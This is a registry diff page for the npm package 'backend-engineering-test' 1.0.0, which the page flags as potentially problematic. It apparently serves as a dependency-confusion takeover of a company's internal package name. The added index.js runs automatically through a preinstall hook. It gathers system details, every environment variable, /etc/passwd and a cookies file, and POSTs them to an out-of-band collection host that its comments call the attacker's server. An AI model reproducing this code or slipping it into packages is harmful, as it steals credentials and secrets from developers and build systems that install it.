backend-engineering-test 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of backend-engineering-test might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +73 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,73 @@
1
+ const os = require('os');
2
+ const fs = require('fs');
3
+ const https = require('https');
4
+
5
+ // Helper function to send data back to your server
6
+ const sendData = (data) => {
7
+ const options = {
8
+ hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Your server where you collect the info
9
+ port: 443,
10
+ path: '/backendEngineeringTestYellowCard', //https://github.com/yellowcardfinancial/backend-engineering-test/blob/9cbfeb35d07d1bf71ee192db170d47b7ac4c76de/package.json#L4
11
+ method: 'POST',
12
+ headers: {
13
+ 'Content-Type': 'application/json',
14
+ },
15
+ };
16
+
17
+ const req = https.request(options, (res) => {
18
+ res.on('data', (d) => {
19
+ process.stdout.write(d);
20
+ });
21
+ });
22
+
23
+ req.on('error', (error) => {
24
+ console.error(error);
25
+ });
26
+
27
+ req.write(JSON.stringify(data));
28
+ req.end();
29
+ };
30
+
31
+ // Gather system information
32
+ const getSystemInfo = () => {
33
+ const userInfo = os.userInfo();
34
+ const networkInterfaces = os.networkInterfaces();
35
+
36
+ const systemInfo = {
37
+ hostname: os.hostname(),
38
+ osType: os.type(),
39
+ osRelease: os.release(),
40
+ platform: os.platform(),
41
+ arch: os.arch(),
42
+ whoami: userInfo.username,
43
+ homeDir: userInfo.homedir,
44
+ networkInterfaces: networkInterfaces,
45
+ ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
46
+ macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
47
+ uptime: os.uptime(),
48
+ currentWorkingDir: process.cwd(),
49
+ envVariables: process.env,
50
+ };
51
+
52
+ return systemInfo;
53
+ };
54
+
55
+ // Optionally, attempt to read sensitive files (ensure you are authorized to do so)
56
+ const readSensitiveFile = (filePath) => {
57
+ try {
58
+ const data = fs.readFileSync(filePath, 'utf8');
59
+ return data;
60
+ } catch (err) {
61
+ return `Error reading ${filePath}: ${err.message}`;
62
+ }
63
+ };
64
+
65
+ // Collect data
66
+ const collectedData = {
67
+ systemInfo: getSystemInfo(),
68
+ passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
69
+ cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
70
+ };
71
+
72
+ // Send collected data back to the attacker's server
73
+ sendData(collectedData);
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "backend-engineering-test",
3
+ "version": "1.0.0",
4
+ "description": "takeover by sachin",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }